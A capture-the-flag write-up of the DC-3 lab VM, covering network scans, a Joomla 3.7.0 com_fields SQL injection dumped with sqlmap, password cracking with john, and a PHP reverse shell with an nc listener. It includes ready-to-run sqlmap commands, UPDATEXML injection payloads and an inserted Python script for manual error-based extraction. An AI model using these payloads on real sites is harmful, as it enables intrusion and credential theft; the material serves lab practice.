Capture The Frog

Frogs hop hop, lol


DC-3 Write up

The attacking machine is Kali.

Attack flow for this box
・Find the target's IP address and its web directories
・Obtain a username and password by exploiting a vulnerability (SQL injection)
・Log in to the CMS
・Build a reverse shell
・Get onto the web server through the reverse shell
・Find and exploit a privilege escalation vulnerability
・As root, enter /root and grab the flag



First, the usual: find the target's IP address and run nmap against it. The ARP sweep below is netdiscover output; the 08:00:27 MAC (PCS Systemtechnik GmbH, the VirtualBox OUI) marks 192.168.3.20 as the VM.

 Currently scanning: 192.168.10.0/16   |   Screen View: Unique Hosts                                       
                                                                                                           
 6 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 324                                           
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.3.1     30:f7:72:be:b9:b9      1      42  Hon Hai Precision Ind. Co.,Ltd.                         
 192.168.3.2     10:6f:3f:e6:28:40      2     120  BUFFALO.INC                                             
 192.168.3.12    70:bc:10:6a:f6:c1      1      42  Microsoft Corporation                                   
 192.168.3.20    08:00:27:ab:aa:6e      1      60  PCS Systemtechnik GmbH                                  
 192.168.3.16    44:09:b8:8c:f4:72      1      60  Salcomp (Shenzhen) CO., LTD.                            

                                                                                                            
┌──(root💀snowyowl)-[~/dirsearch]
└─# nmap -sS -A -Pn 192.168.3.20 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-03 12:09 JST
Nmap scan report for 192.168.3.20
Host is up (0.00072s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 08:00:27:AB:AA:6E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.72 ms 192.168.3.20

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds

Only port 80 is open, running Apache 2.4.18 on Ubuntu with a Joomla generator tag, so DC-3 is a web server. Next, enumerate the exposed web directories with nikto and dirsearch.

                                                                                                            
┌──(root💀snowyowl)-[~/dirsearch]
└─# nikto -h 192.168.3.20           
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.3.20
+ Target Hostname:    192.168.3.20
+ Target Port:        80
+ Start Time:         2021-09-03 12:09:49 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8726 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2021-09-03 12:11:01 (GMT9) (72 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                            
┌──(root💀snowyowl)-[~/dirsearch]
└─# ls
banner.txt       db            Dockerfile   logs       requirements.txt  static
CHANGELOG.md     default.conf  __init__.py  README.md  setup.cfg         thirdparty
CONTRIBUTORS.md  dirsearch.py  lib          reports    setup.py
                                                                                                            
┌──(root💀snowyowl)-[~/dirsearch]
└─# python3 dirsearch.py -u http://192.168.3.20/

  _|. _ _  _  _  _ _|_    v0.4.2                                                                            
 (_||| _) (/_(_|| (_| )                                                                                     
                                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/dirsearch/reports/192.168.3.20/-_21-09-03_12-11-29.txt

Error Log: /root/dirsearch/logs/errors-21-09-03_12-11-29.log

Target: http://192.168.3.20/

[12:11:29] Starting: 
[12:11:32] 403 -  298B  - /.ht_wsr.txt                                     
[12:11:32] 403 -  301B  - /.htaccess.bak1
[12:11:32] 403 -  301B  - /.htaccess.orig
[12:11:32] 403 -  303B  - /.htaccess.sample
[12:11:32] 403 -  301B  - /.htaccess.save
[12:11:32] 403 -  301B  - /.htaccess_orig                                  
[12:11:32] 403 -  300B  - /.htaccessOLD2
[12:11:32] 403 -  299B  - /.htaccess_sc
[12:11:32] 403 -  302B  - /.htaccess_extra
[12:11:32] 403 -  291B  - /.htm
[12:11:32] 403 -  299B  - /.htaccessOLD
[12:11:32] 403 -  299B  - /.htaccessBAK
[12:11:32] 403 -  292B  - /.html
[12:11:32] 403 -  298B  - /.httr-oauth
[12:11:32] 403 -  297B  - /.htpasswds
[12:11:32] 403 -  301B  - /.htpasswd_test
[12:11:33] 403 -  291B  - /.php                                            
[12:11:33] 403 -  292B  - /.php3                                           
[12:11:37] 200 -   18KB - /LICENSE.txt                                      
[12:11:37] 200 -    4KB - /README.txt                                       
[12:11:47] 301 -  320B  - /administrator  ->  http://192.168.3.20/administrator/
[12:11:47] 403 -  310B  - /administrator/.htaccess                          
[12:11:47] 200 -    2KB - /administrator/includes/                          
[12:11:47] 200 -   31B  - /administrator/cache/
[12:11:47] 200 -    5KB - /administrator/                                   
[12:11:47] 301 -  325B  - /administrator/logs  ->  http://192.168.3.20/administrator/logs/
[12:11:47] 200 -   31B  - /administrator/logs/
[12:11:47] 200 -    5KB - /administrator/index.php                          
[12:11:51] 301 -  310B  - /bin  ->  http://192.168.3.20/bin/                
[12:11:51] 200 -   31B  - /bin/
[12:11:52] 200 -   31B  - /cache/                                           
[12:11:52] 301 -  312B  - /cache  ->  http://192.168.3.20/cache/
[12:11:53] 200 -   31B  - /cli/                                             
[12:11:53] 301 -  317B  - /components  ->  http://192.168.3.20/components/  
[12:11:53] 200 -   31B  - /components/                                      
[12:11:54] 200 -    0B  - /configuration.php                                
[12:12:02] 200 -    3KB - /htaccess.txt                                     
[12:12:03] 301 -  313B  - /images  ->  http://192.168.3.20/images/          
[12:12:03] 200 -   31B  - /images/
[12:12:03] 301 -  315B  - /includes  ->  http://192.168.3.20/includes/      
[12:12:03] 200 -   31B  - /includes/                                        
[12:12:04] 200 -    8KB - /index.php                                        
[12:12:06] 301 -  315B  - /language  ->  http://192.168.3.20/language/      
[12:12:06] 200 -   31B  - /layouts/                                         
[12:12:06] 200 -   31B  - /libraries/                                       
[12:12:06] 301 -  316B  - /libraries  ->  http://192.168.3.20/libraries/    
[12:12:09] 301 -  312B  - /media  ->  http://192.168.3.20/media/            
[12:12:09] 200 -   31B  - /media/                                           
[12:12:10] 301 -  314B  - /modules  ->  http://192.168.3.20/modules/        
[12:12:10] 200 -   31B  - /modules/                                         
[12:12:17] 200 -   31B  - /plugins/                                         
[12:12:17] 301 -  314B  - /plugins  ->  http://192.168.3.20/plugins/        
[12:12:20] 200 -  836B  - /robots.txt.dist                                  
[12:12:22] 403 -  300B  - /server-status                                    
[12:12:22] 403 -  301B  - /server-status/
[12:12:27] 301 -  316B  - /templates  ->  http://192.168.3.20/templates/    
[12:12:27] 200 -   31B  - /templates/
[12:12:27] 200 -    0B  - /templates/beez3/                                 
[12:12:27] 200 -   31B  - /templates/index.html
[12:12:27] 200 -    0B  - /templates/protostar/                             
[12:12:27] 200 -    0B  - /templates/system/                                
[12:12:28] 301 -  310B  - /tmp  ->  http://192.168.3.20/tmp/                
[12:12:29] 200 -   31B  - /tmp/                                             
[12:12:32] 200 -    2KB - /web.config.txt                                   
                                                                             
Task Completed

Of the nikto findings, the Joomla fingerprint (htaccess.txt, /administrator/index.php) is what matters; the PostNuke EW FileManager hit is a false positive, as nikto itself warned that the server answers junk requests with a valid response. Because there is a scanner dedicated to this CMS (Joomla), use it to dig into the details.


┌──(root💀snowyowl)-[~/dirsearch]
└─# joomscan -u http://192.168.3.20/
    ____  _____  _____  __  __  ___   ___    __    _  _ 
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  ( 
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)
   
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.3.20/ ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing : 
http://192.168.3.20/administrator/components
http://192.168.3.20/administrator/modules
http://192.168.3.20/administrator/templates
http://192.168.3.20/images/banners
                                                                                                            
                                                                                                            
[+] Checking apache info/status files                                                                       
[++] Readable info/status files are not found                                                               
                                                                                                            
[+] admin finder                                                                                            
[++] Admin page : http://192.168.3.20/administrator/                                                        
                                                                                                            
[+] Checking robots.txt existing                                                                            
[++] robots.txt is not found                                                                                
                                                                                                            
[+] Finding common backup files name                                                                        
[++] Backup files are not found                                                                             
                                                                                                            
[+] Finding common log files name                                                                           
[++] error log is not found                                                                                 
                                                                                                            
[+] Checking sensitive config.php.x file                                                                    
[++] Readable config files are not found                                                                    
                                                                                                            
                                                                                                            
Your Report : reports/192.168.3.20/ 


The scans above gave the Joomla version (3.7.0), so check whether there is a known exploit for it. Do not take joomscan's "Target Joomla core is not vulnerable" verdict at face value: this joomscan build dates from 2018 and its core checks are incomplete, so always cross-check the exact version against searchsploit.

┌──(root💀snowyowl)-[~]
└─# searchsploit "Joomla 3.7.0"
-------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                            |  Path
-------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                                | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting             | php/webapps/43488.txt
-------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

                                                                        
                                                                                                                                        
     

A SQL injection exists for this exact version: the com_fields injection (EDB 42033, CVE-2017-8917, fixed in Joomla 3.7.1). The exploit-db entry (www.exploit-db.com) gives a template sqlmap command for it, reproduced below.

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

The injectable parameter is list[fullordering]; keep it exactly as in the template and only replace the host with the target's address.

┌──(root💀snowyowl)-[~]
└─# sqlmap -u "http://192.168.3.20/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.7#stable}
|_ -| . [']     | .'| . |                                                                                   
|___|_  [,]_|_|_|__,|  _|                                                                                   
      |_|V...       |_|   http://sqlmap.org                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:25:55 /2021-09-03/

[12:25:55] [INFO] fetched random HTTP User-Agent header value 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'                                                                                
[12:25:55] [INFO] resuming back-end DBMS 'mysql' 
[12:25:55] [INFO] testing connection to the target URL
[12:25:55] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=pt7u81sacce...hsvbocmn87'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,0x717a787871,(SELECT (ELT(1743=1743,1))),0x71626b6a71),2253))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9285 FROM (SELECT(SLEEP(5)))oGde)
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[12:25:59] [INFO] fetching database names
[12:25:59] [INFO] resumed: 'information_schema'
[12:25:59] [INFO] resumed: 'joomladb'
[12:25:59] [INFO] resumed: 'mysql'
[12:25:59] [INFO] resumed: 'performance_schema'
[12:25:59] [INFO] resumed: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

[12:25:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:25:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.20'

[*] ending @ 12:25:59 /2021-09-03/

With the database names known, list the tables inside joomladb.

┌──(root💀snowyowl)-[~]
└─# sqlmap -u "http://192.168.3.20/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables                                      
        ___
       __H__                                                                                                
 ___ ___[.]_____ ___ ___  {1.5.7#stable}                                                                    
|_ -| . [.]     | .'| . |                                                                                   
|___|_  [.]_|_|_|__,|  _|                                                                                   
      |_|V...       |_|   http://sqlmap.org                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:28:57 /2021-09-03/

[12:28:57] [INFO] fetched random HTTP User-Agent header value 'Opera/9.00 (X11; Linux i686; U; de)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[12:28:57] [INFO] resuming back-end DBMS 'mysql' 
[12:28:57] [INFO] testing connection to the target URL
[12:28:58] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=shu32a83a3i...vqs1g25h14'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,0x717a787871,(SELECT (ELT(1743=1743,1))),0x71626b6a71),2253))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9285 FROM (SELECT(SLEEP(5)))oGde)
---
[12:29:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[12:29:00] [INFO] fetching tables for database: 'joomladb'
Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks    |
| #__banners          |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments    |
| #__bsms_locations   |
| #__bsms_mediafiles  |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series      |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers    |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics      |
| #__bsms_update      |
| #__categories       |
| #__contact_details  |
| #__content_frontpag |
| #__content_rating   |
| #__content_types    |
| #__content          |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups    |
| #__fields_values    |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy  |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens    |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages        |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules          |
| #__newsfeeds        |
| #__overrider        |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas          |
| #__session          |
| #__tags             |
| #__template_styles  |
| #__ucm_base         |
| #__ucm_content      |
| #__ucm_history      |
| #__update_sites_ext |
| #__update_sites     |
| #__updates          |
| #__user_keys        |
| #__user_notes       |
| #__user_profiles    |
| #__user_usergroup_m |
| #__usergroups       |
| #__users            |
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+

[12:29:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:29:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.20'

[*] ending @ 12:29:00 /2021-09-03/

The users table is the obvious target, so dump its name and password columns. Two notes: the table prefix here is literally #__ (normally Joomla substitutes a site-specific prefix at install time), so the table name must be quoted on the shell and backticked in raw SQL; and --tables is left over from the previous command, which is why the table list is printed once more before the dump.

┌──(root💀snowyowl)-[~]
└─# sqlmap -u "http://192.168.3.20/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -T '#__users' -C name,password --dump
        ___
       __H__                                                                                                
 ___ ___[']_____ ___ ___  {1.5.7#stable}                                                                    
|_ -| . [(]     | .'| . |                                                                                   
|___|_  [']_|_|_|__,|  _|                                                                                   
      |_|V...       |_|   http://sqlmap.org                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:37:44 /2021-09-03/

[12:37:44] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/526.3 (KHTML, like Gecko) Chrome/14.0.564.21 Safari/526.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'                                                                                               
[12:37:44] [INFO] resuming back-end DBMS 'mysql' 
[12:37:44] [INFO] testing connection to the target URL
[12:37:44] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=8d3l6tqthp3...9qk5fv1qh4'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,0x717a787871,(SELECT (ELT(1743=1743,1))),0x71626b6a71),2253))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9285 FROM (SELECT(SLEEP(5)))oGde)
---
[12:37:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[12:37:46] [INFO] fetching tables for database: 'joomladb'
Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks    |
| #__banners          |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments    |
| #__bsms_locations   |
| #__bsms_mediafiles  |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series      |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers    |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics      |
| #__bsms_update      |
| #__categories       |
| #__contact_details  |
| #__content_frontpag |
| #__content_rating   |
| #__content_types    |
| #__content          |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups    |
| #__fields_values    |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy  |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens    |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages        |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules          |
| #__newsfeeds        |
| #__overrider        |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas          |
| #__session          |
| #__tags             |
| #__template_styles  |
| #__ucm_base         |
| #__ucm_content      |
| #__ucm_history      |
| #__update_sites_ext |
| #__update_sites     |
| #__updates          |
| #__user_keys        |
| #__user_notes       |
| #__user_profiles    |
| #__user_usergroup_m |
| #__usergroups       |
| #__users            |
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+

[12:37:46] [INFO] fetching entries of column(s) 'name,password' for table '#__users' in database 'joomladb'
[12:37:46] [INFO] resumed: 'admin'
[12:37:46] [INFO] resumed: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
Database: joomladb
Table: #__users
[1 entry]
+-------+--------------------------------------------------------------+
| name  | password                                                     |
+-------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+-------+--------------------------------------------------------------+

[12:37:46] [INFO] table 'joomladb.`#__users`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.3.20/dump/joomladb/#__users.csv'                                                                             
[12:37:46] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:37:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.20'

[*] ending @ 12:37:46 /2021-09-03/
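To show what sqlmap is doing under the hood, here is a manual version of the same error-based extraction, written as an added example for this write-up (it is not the author's code or sqlmap's). MySQL's UPDATEXML() echoes a malformed XPath expression back in its error text, so wrapping a subquery in it leaks the result, but the echoed string is cut at 32 characters, which is why the 60-character bcrypt hash has to be pulled out in SUBSTRING() slices. The target URL, the literal `#__users` table name (backticked, because a bare # would start a MySQL comment) and admin's hash come from the output above; the fake_target function is a constructed stand-in for the vulnerable server so the script runs offline, and http_fetch is the transport to use against the real box.

```python
"""Manual error-based extraction through the Joomla 3.7.0 com_fields SQL
injection (CVE-2017-8917), as an alternative to letting sqlmap drive it.

MySQL's UPDATEXML() reports a bad XPath expression by echoing it back in
the error text, so a subquery wrapped in it leaks its result one row at
a time. The echoed text is truncated to 32 characters, hence the
SUBSTRING() slicing below.
"""
import re
import urllib.error
import urllib.request
from urllib.parse import parse_qs, urlencode, urlparse

BASE = "http://192.168.3.20/index.php"  # the DC-3 target from the write-up
MARK = "~"                              # 0x7e, marks where the leak starts
CHUNK = 31                              # 32-char echo limit minus the marker
ERR_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def build_query(sql_expr):
    """Return the GET URL that injects sql_expr into list[fullordering].
    This is the same error-based vector sqlmap reported above."""
    payload = "(UPDATEXML(1,CONCAT(0x7e,(%s)),1))" % sql_expr
    params = {
        "option": "com_fields",
        "view": "fields",
        "layout": "modal",
        "list[fullordering]": payload,
    }
    return BASE + "?" + urlencode(params)


def parse_leak(body):
    """Pull the leaked fragment out of the MySQL error in a response body.
    Returns None when the marker is absent (e.g. the query returned no row)."""
    m = ERR_RE.search(body)
    return m.group(1) if m else None


def extract(fetch, column, table, where="1=1", max_len=255):
    """Read one value from the database in CHUNK-sized slices.

    fetch(url) -> body performs the HTTP GET. It is passed in so the same
    logic runs against the live target (http_fetch) or offline (fake_target).
    """
    pieces = []
    for off in range(1, max_len + 1, CHUNK):
        expr = "SELECT SUBSTRING(%s,%d,%d) FROM %s WHERE %s LIMIT 1" % (
            column, off, CHUNK, table, where)
        piece = parse_leak(fetch(build_query(expr)))
        if not piece:
            break                   # empty slice: end of the value
        pieces.append(piece)
        if len(piece) < CHUNK:
            break                   # short slice: end of the value
    return "".join(pieces)


def http_fetch(url):
    """Transport for a live target. Joomla returns the error page as HTTP 500
    (sqlmap warned about that above), so the body of the HTTPError must be
    read rather than discarded."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


# admin's bcrypt hash as dumped by sqlmap above
HASH = "$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu"


def fake_target(url):
    """Constructed stand-in for the vulnerable server (not part of the
    write-up): answers the injected SUBSTRING() with a MySQL-style error
    that echoes the requested slice, truncated to 32 characters as MySQL does."""
    injected = parse_qs(urlparse(url).query)["list[fullordering]"][0]
    m = re.search(r"SUBSTRING\(password,(\d+),(\d+)\)", injected)
    off, length = int(m.group(1)), int(m.group(2))
    echoed = (MARK + HASH[off - 1:off - 1 + length])[:32]
    return "<h1>500</h1>XPATH syntax error: '%s'" % echoed


if __name__ == "__main__":
    # Swap fake_target for http_fetch to run this against the real box.
    print(extract(fake_target, "password", "`#__users`", "name='admin'"))
```

Two slices are enough for a bcrypt hash: the first returns 31 characters, the second returns the remaining 29, and a slice shorter than CHUNK (or empty) ends the loop. Against the live box the two HTTP 500 responses per value are what shows up in the Apache log, which is also the detection signal for this attack.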

With the hash dumped, crack admin's password with john. hash.txt holds the dumped hash on a single line. The $2y$10$ prefix identifies bcrypt with cost 10, i.e. 2^10 = 1024 rounds, which matches the "Cost 1 (iteration count) is 1024" that john reports.

$ john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy           (?)

Cracking with john gives admin:snoopy. Log in to the site's /administrator/ backend found earlier with those credentials.

Login succeeded. Now build the reverse shell: create a new file, index2.php, and make it the reverse shell. The shell used is pentestmonkey's php-reverse-shell.php that ships with Kali (located below). Before saving it as index2.php under the Joomla webroot, edit its $ip to the Kali host's address and $port to 666 so that it matches the nc listener started below; requesting index2.php from a browser then triggers the connection back.

Creating the reverse shell and the payload:

┌──(root💀snowyowl)-[~]
└─# locate php-reverse-shell.php
/usr/share/beef-xss/modules/exploits/m0n0wall/php-reverse-shell.php
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php

┌──(root💀snowyowl)-[~]
└─# nc -lvp 666

The payload came back cleanly, so poke around a bit (the session below is a meterpreter session). First, /etc/passwd. It is sometimes described as holding password hashes, but on a current Linux the second field is just x and the hashes live in /etc/shadow, which only root can read; what /etc/passwd does reveal is the list of accounts and which of them have a real login shell.

meterpreter > cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
